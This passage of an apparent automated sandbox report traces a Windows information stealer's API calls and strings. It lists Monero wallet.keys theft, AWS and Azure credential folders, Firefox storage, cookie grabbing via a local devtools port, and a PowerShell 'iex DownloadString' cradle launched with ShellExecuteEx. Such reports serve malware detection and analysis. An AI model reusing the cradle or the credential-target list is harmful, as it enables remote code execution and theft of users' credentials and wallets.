                          • DeleteFileA.KERNEL32(00000000), ref: 003A23F7
                          • FindNextFileA.KERNEL32(00000000,?), ref: 003A2444
                          • FindClose.KERNEL32(00000000), ref: 003A2453
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                          • String ID:
                          • API String ID: 2857443207-0
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B6445
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B6480
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003B64AA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B64E1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B6506
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B650E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B6537
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Similarity
                          • API ID: lstrcpy$FolderPathlstrcat
                          • String ID: \..\
                          • API String ID: 2938889746-4220915743
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B43A3
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B43D6
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B43FE
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B4409
                          • lstrlen.KERNEL32(\storage\default\), ref: 003B4414
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B4431
                          • lstrcat.KERNEL32(00000000,\storage\default\), ref: 003B443D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B4466
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B4471
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B4498
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B44D7
                          • lstrcat.KERNEL32(00000000,?), ref: 003B44DF
                          • lstrlen.KERNEL32(003D1794), ref: 003B44EA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B4507
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003B4513
                          • lstrlen.KERNEL32(.metadata-v2), ref: 003B451E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B453B
                          • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 003B4547
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B456E
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B45A0
                          • GetFileAttributesA.KERNEL32(00000000), ref: 003B45A7
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B4601
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B462A
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B4653
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B467B
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B46AF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                          • String ID: .metadata-v2$\storage\default\
                          • API String ID: 1033685851-762053450
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B57D5
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 003B5804
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B5835
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B585D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B5868
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B5890
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B58C8
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B58D3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B58F8
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B592E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B5956
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B5961
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B5988
                          • lstrlen.KERNEL32(003D1794), ref: 003B599A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B59B9
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003B59C5
                          • lstrlen.KERNEL32(00F2D690), ref: 003B59D4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B59F7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B5A02
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B5A2C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B5A58
                          • GetFileAttributesA.KERNEL32(00000000), ref: 003B5A5F
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B5AB7
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B5B2D
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B5B56
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B5B89
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B5BB5
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B5BEF
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B5C4C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B5C70
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                          • String ID:
                          • API String ID: 2428362635-0
                          APIs
                            • Part of subcall function 003A1120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003A1135
                            • Part of subcall function 003A1120: RtlAllocateHeap.NTDLL(00000000), ref: 003A113C
                            • Part of subcall function 003A1120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 003A1159
                            • Part of subcall function 003A1120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 003A1173
                            • Part of subcall function 003A1120: RegCloseKey.ADVAPI32(?), ref: 003A117D
                          • lstrcat.KERNEL32(?,00000000), ref: 003A11C0
                          • lstrlen.KERNEL32(?), ref: 003A11CD
                          • lstrcat.KERNEL32(?,.keys), ref: 003A11E8
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A121F
                          • lstrlen.KERNEL32(00F290B8), ref: 003A122D
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A1251
                          • lstrcat.KERNEL32(00000000,00F290B8), ref: 003A1259
                          • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 003A1264
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1288
                          • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 003A1294
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A12BA
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A12FF
                          • lstrlen.KERNEL32(00F2D6C0), ref: 003A130E
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A1335
                          • lstrcat.KERNEL32(00000000,?), ref: 003A133D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1378
                          • lstrcat.KERNEL32(00000000), ref: 003A1385
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A13AC
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 003A13D5
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A1401
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A143D
                            • Part of subcall function 003BEDE0: lstrcpy.KERNEL32(00000000,?), ref: 003BEE12
                          • DeleteFileA.KERNEL32(?), ref: 003A1471
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                          • String ID: .keys$\Monero\wallet.keys
                          • API String ID: 2881711868-3586502688
                          • Opcode ID: f480c061c6eca6ef14456b4f8ec999140a14f11f49729162505c1a71c71ff72a
                          • Instruction ID: e317f40fc05bf694060f6955051108f4d2cbe27ea45c20eca633185c8cb4458e
                          • Opcode Fuzzy Hash: f480c061c6eca6ef14456b4f8ec999140a14f11f49729162505c1a71c71ff72a
                          • Instruction Fuzzy Hash: C5A18171A112169BCB22EFB8DC49AAF77B9EF56300F054429F905EB251EB30DD05CB90
                          APIs
                          • memset.MSVCRT ref: 003BE740
                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 003BE769
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BE79F
                          • lstrcat.KERNEL32(?,00000000), ref: 003BE7AD
                          • lstrcat.KERNEL32(?,\.azure\), ref: 003BE7C6
                          • memset.MSVCRT ref: 003BE805
                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 003BE82D
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BE85F
                          • lstrcat.KERNEL32(?,00000000), ref: 003BE86D
                          • lstrcat.KERNEL32(?,\.aws\), ref: 003BE886
                          • memset.MSVCRT ref: 003BE8C5
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 003BE8F1
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BE920
                          • lstrcat.KERNEL32(?,00000000), ref: 003BE92E
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 003BE947
                          • memset.MSVCRT ref: 003BE986
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$memset$FolderPathlstrcpy
                          • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 4067350539-3645552435
                          • Opcode ID: 1837f6f40b8795858a563648c7623096b03ccfb0ab2fd3835529639b7177ff56
                          • Instruction ID: 9125a81a3819a0f61de372e97a23d86847400d1a492a55dfc52d0aa945f2e69f
                          • Opcode Fuzzy Hash: 1837f6f40b8795858a563648c7623096b03ccfb0ab2fd3835529639b7177ff56
                          • Instruction Fuzzy Hash: 2171E771E50219ABDB26EB68DC46FEE7378EF58700F000899F7199B191EF709E488B54
                          APIs
                          • lstrcpy.KERNEL32 ref: 003BABCF
                          • lstrlen.KERNEL32(00F2EAD0), ref: 003BABE5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BAC0D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003BAC18
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BAC41
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BAC84
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003BAC8E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BACB7
                          • lstrlen.KERNEL32(003D4AD4), ref: 003BACD1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BACF3
                          • lstrcat.KERNEL32(00000000,003D4AD4), ref: 003BACFF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BAD28
                          • lstrlen.KERNEL32(003D4AD4), ref: 003BAD3A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BAD5C
                          • lstrcat.KERNEL32(00000000,003D4AD4), ref: 003BAD68
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BAD91
                          • lstrlen.KERNEL32(00F2E998), ref: 003BADA7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BADCF
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003BADDA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BAE03
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BAE3F
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003BAE49
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BAE6F
                          • lstrlen.KERNEL32(00000000), ref: 003BAE85
                          • lstrcpy.KERNEL32(00000000,00F2E8D8), ref: 003BAEB8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen
                          • String ID: f
                          • API String ID: 2762123234-1993550816
                          • Opcode ID: 4cf2f2e55f1d2a934c65604633b26119c44d89d2510d5dffe93093cf1bd74d5c
                          • Instruction ID: 20483dd49ebd2cf7674005d572d2315edcf21c325f0c311788bfe4551301b9c8
                          • Opcode Fuzzy Hash: 4cf2f2e55f1d2a934c65604633b26119c44d89d2510d5dffe93093cf1bd74d5c
                          • Instruction Fuzzy Hash: 4CB18E30A11A169BCB23EF68DC48AEFB7B5EF41705F05042AB911DBA61EB30DD15CB91
                          APIs
                          • LoadLibraryA.KERNEL32(ws2_32.dll,?,003B72A4), ref: 003C47E6
                          • GetProcAddress.KERNEL32(00000000,connect), ref: 003C47FC
                          • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 003C480D
                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 003C481E
                          • GetProcAddress.KERNEL32(00000000,htons), ref: 003C482F
                          • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 003C4840
                          • GetProcAddress.KERNEL32(00000000,recv), ref: 003C4851
                          • GetProcAddress.KERNEL32(00000000,socket), ref: 003C4862
                          • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 003C4873
                          • GetProcAddress.KERNEL32(00000000,closesocket), ref: 003C4884
                          • GetProcAddress.KERNEL32(00000000,send), ref: 003C4895
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                          • API String ID: 2238633743-3087812094
                          • Opcode ID: 358ee30baf0eb4ce34c17037d4e17dda0cfbfb96f04e17d048dc216b6074b4a7
                          • Instruction ID: 5ecc791fe8432a510f8cba95fa925987b219d8255d532e157c76603307c11d7c
                          • Opcode Fuzzy Hash: 358ee30baf0eb4ce34c17037d4e17dda0cfbfb96f04e17d048dc216b6074b4a7
                          • Instruction Fuzzy Hash: 26113672953721AB8B329FA5BC0DAA63BB8FA29706304491BF551E6360DAF44408FF50
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003BBE53
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003BBE86
                          • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 003BBE91
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BBEB1
                          • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 003BBEBD
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BBEE0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003BBEEB
                          • lstrlen.KERNEL32(')"), ref: 003BBEF6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BBF13
                          • lstrcat.KERNEL32(00000000,')"), ref: 003BBF1F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BBF46
                          • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 003BBF66
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BBF88
                          • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 003BBF94
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BBFBA
                          • ShellExecuteEx.SHELL32(?), ref: 003BC00C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 4016326548-898575020
                          • Opcode ID: c16b0356c5b9f559e5281518e4fa010e27f9e2f7aeec3aa10b9ab0511c0841c3
                          • Instruction ID: 12ec9731ea84ca2213dad08035872358a59fbf9335dac97226cf3575027ab376
                          • Opcode Fuzzy Hash: c16b0356c5b9f559e5281518e4fa010e27f9e2f7aeec3aa10b9ab0511c0841c3
                          • Instruction Fuzzy Hash: 1361C631E11216ABCB23AFB89C89AEFBBB9EF15704F05042AF505D7611DF74C9058B90
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003C184F
                          • lstrlen.KERNEL32(00F16D10), ref: 003C1860
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C1887
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003C1892
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C18C1
                          • lstrlen.KERNEL32(003D4FA0), ref: 003C18D3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C18F4
                          • lstrcat.KERNEL32(00000000,003D4FA0), ref: 003C1900
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C192F
                          • lstrlen.KERNEL32(00F16D20), ref: 003C1945
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C196C
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003C1977
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C19A6
                          • lstrlen.KERNEL32(003D4FA0), ref: 003C19B8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C19D9
                          • lstrcat.KERNEL32(00000000,003D4FA0), ref: 003C19E5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C1A14
                          • lstrlen.KERNEL32(00F16D70), ref: 003C1A2A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C1A51
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003C1A5C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C1A8B
                          • lstrlen.KERNEL32(00F16D80), ref: 003C1AA1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C1AC8
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003C1AD3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C1B02
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcatlstrlen
                          • String ID:
                          • API String ID: 1049500425-0
                          • Opcode ID: 7954d0a323d9bd6a61ace437531aef1d00f225b9fc557145d120740d82c839af
                          • Instruction ID: bfcbc544e1ac2df967f4309df825bcc9a7f6ef414cae4c88740a1f2d52a7e1ff
                          • Opcode Fuzzy Hash: 7954d0a323d9bd6a61ace437531aef1d00f225b9fc557145d120740d82c839af
                          • Instruction Fuzzy Hash: 13910D75601703ABD722AFB9DC88F27B7E9EF16300B15442EA886C7662DB34EC45DB50
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B4793
                          • LocalAlloc.KERNEL32(00000040,?), ref: 003B47C5
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B4812
                          • lstrlen.KERNEL32(003D4B60), ref: 003B481D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B483A
                          • lstrcat.KERNEL32(00000000,003D4B60), ref: 003B4846
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B486B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B4898
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B48A3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B48CA
                          • StrStrA.SHLWAPI(?,00000000), ref: 003B48DC
                          • lstrlen.KERNEL32(?), ref: 003B48F0
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B4931
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B49B8
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B49E1
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B4A0A
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B4A30
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B4A5D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                          • String ID: ^userContextId=4294967295$moz-extension+++
                          • API String ID: 4107348322-3310892237
                          • Opcode ID: f6bcf0652a553749c2395f59ba0f9a565e5089666030b1684a8ea9d487551fbe
                          • Instruction ID: d13b3b56d95f26b5ba8c2db6624d4961e6387c9ba83b568901f2b48a3407e163
                          • Opcode Fuzzy Hash: f6bcf0652a553749c2395f59ba0f9a565e5089666030b1684a8ea9d487551fbe
                          • Instruction Fuzzy Hash: 12B19F31A112169BCB27EF68D889AAF77B5EF51704F054029F946EBA12DB30EC058B94
                          APIs
                            • Part of subcall function 003A90C0: InternetOpenA.WININET(003CCFEC,00000001,00000000,00000000,00000000), ref: 003A90DF
                            • Part of subcall function 003A90C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 003A90FC
                            • Part of subcall function 003A90C0: InternetCloseHandle.WININET(00000000), ref: 003A9109
                          • strlen.MSVCRT ref: 003A92E1
                          • strlen.MSVCRT ref: 003A92FA
                            • Part of subcall function 003A8980: std::_Xinvalid_argument.LIBCPMT ref: 003A8996
                          • strlen.MSVCRT ref: 003A9399
                          • strlen.MSVCRT ref: 003A93E6
                          • lstrcat.KERNEL32(?,cookies), ref: 003A9547
                          • lstrcat.KERNEL32(?,003D1794), ref: 003A9559
                          • lstrcat.KERNEL32(?,?), ref: 003A956A
                          • lstrcat.KERNEL32(?,003D4B98), ref: 003A957C
                          • lstrcat.KERNEL32(?,?), ref: 003A958D
                          • lstrcat.KERNEL32(?,.txt), ref: 003A959F
                          • lstrlen.KERNEL32(?), ref: 003A95B6
                          • lstrlen.KERNEL32(?), ref: 003A95DB
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A9614
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                          • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                          • API String ID: 1201316467-3542011879
                          • Opcode ID: 96035a3fcacbc210d0af7a45d089fb8e241b8b23722c3a8af540cca6a4338d6b
                          • Instruction ID: 780d6e6a500fb8ab3d6b12cb1b4fdd8ffc113cc8f2c70752858a72860c306e59
                          • Opcode Fuzzy Hash: 96035a3fcacbc210d0af7a45d089fb8e241b8b23722c3a8af540cca6a4338d6b
                          • Instruction Fuzzy Hash: C0E11871E10218EBDF16DFA8D885ADEBBB5FF59300F1044AAE509A7251EB309E45CF90
                          APIs
                          • memset.MSVCRT ref: 003BD9A1
                          • memset.MSVCRT ref: 003BD9B3
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003BD9DB
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BDA0E
                          • lstrcat.KERNEL32(?,00000000), ref: 003BDA1C
                          • lstrcat.KERNEL32(?,00F2EBF0), ref: 003BDA36
                          • lstrcat.KERNEL32(?,?), ref: 003BDA4A
                          • lstrcat.KERNEL32(?,00F2D690), ref: 003BDA5E
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BDA8E
                          • GetFileAttributesA.KERNEL32(00000000), ref: 003BDA95
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003BDAFE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                          • String ID:
                          • API String ID: 2367105040-0
                          • Opcode ID: 2e36cab6a63939e01a9f7cbaf8ff8a041adac12cdf8544cdbcc3dd9de8e63f83
                          • Instruction ID: 8e0611e614fbb01234f58b41eccaaae324867a7d21541ee7fe80a2e4e8d6b612
                          • Opcode Fuzzy Hash: 2e36cab6a63939e01a9f7cbaf8ff8a041adac12cdf8544cdbcc3dd9de8e63f83
                          • Instruction Fuzzy Hash: CAB1A271D10259AFDB22EFA4DC889EE77B9EF48304F14456AF606E7250EB309E44CB90
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003AB330
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AB37E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AB3A9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003AB3B1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AB3D9
                          • lstrlen.KERNEL32(003D4C50), ref: 003AB450
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AB474
                          • lstrcat.KERNEL32(00000000,003D4C50), ref: 003AB480
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AB4A9
                          • lstrlen.KERNEL32(00000000), ref: 003AB52D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AB557
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003AB55F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AB587
                          • lstrlen.KERNEL32(003D4AD4), ref: 003AB5FE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AB622
                          • lstrcat.KERNEL32(00000000,003D4AD4), ref: 003AB62E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AB65E
                          • lstrlen.KERNEL32(?), ref: 003AB767
                          • lstrlen.KERNEL32(?), ref: 003AB776
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AB79E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat
                          • String ID:
                          • API String ID: 2500673778-0
                          • Opcode ID: 1b7a3e9d9635c9440e6da259ddd2c3e5b42af08ab3d925c6654c48c2a00f1dd3
                          • Instruction ID: b5cc61da3e15bbb9f6d6fe92364ef49282048daa9a6e7571f5d7bb6c15235806
                          • Opcode Fuzzy Hash: 1b7a3e9d9635c9440e6da259ddd2c3e5b42af08ab3d925c6654c48c2a00f1dd3
                          • Instruction Fuzzy Hash: A2024230A01215CFCB26DF69D949B6AF7B5FF56304F19806EE4099B262D771DC46CB80
                          APIs
                            • Part of subcall function 003C71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003C71FE
                          • RegOpenKeyExA.ADVAPI32(?,00F28E68,00000000,00020019,?), ref: 003C37BD
                          • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 003C37F7
                          • wsprintfA.USER32 ref: 003C3822
                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 003C3840
                          • RegCloseKey.ADVAPI32(?), ref: 003C384E
                          • RegCloseKey.ADVAPI32(?), ref: 003C3858
                          • RegQueryValueExA.ADVAPI32(?,00F2EA10,00000000,000F003F,?,?), ref: 003C38A1
                          • lstrlen.KERNEL32(?), ref: 003C38B6
                          • RegQueryValueExA.ADVAPI32(?,00F2E908,00000000,000F003F,?,00000400), ref: 003C3927
                          • RegCloseKey.ADVAPI32(?), ref: 003C3972
                          • RegCloseKey.ADVAPI32(?), ref: 003C3989
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                          • String ID: - $%s\%s$?
                          • API String ID: 13140697-3278919252
                          • Opcode ID: 8f570686aba910e5c3dae83ffed475e111efd6864a550c839bd88b023e2bc73d
                          • Instruction ID: 8765368eb2e81353a5384d6e872dbbe8a9dd5a4b1c6a591bb2a620e1709eafda
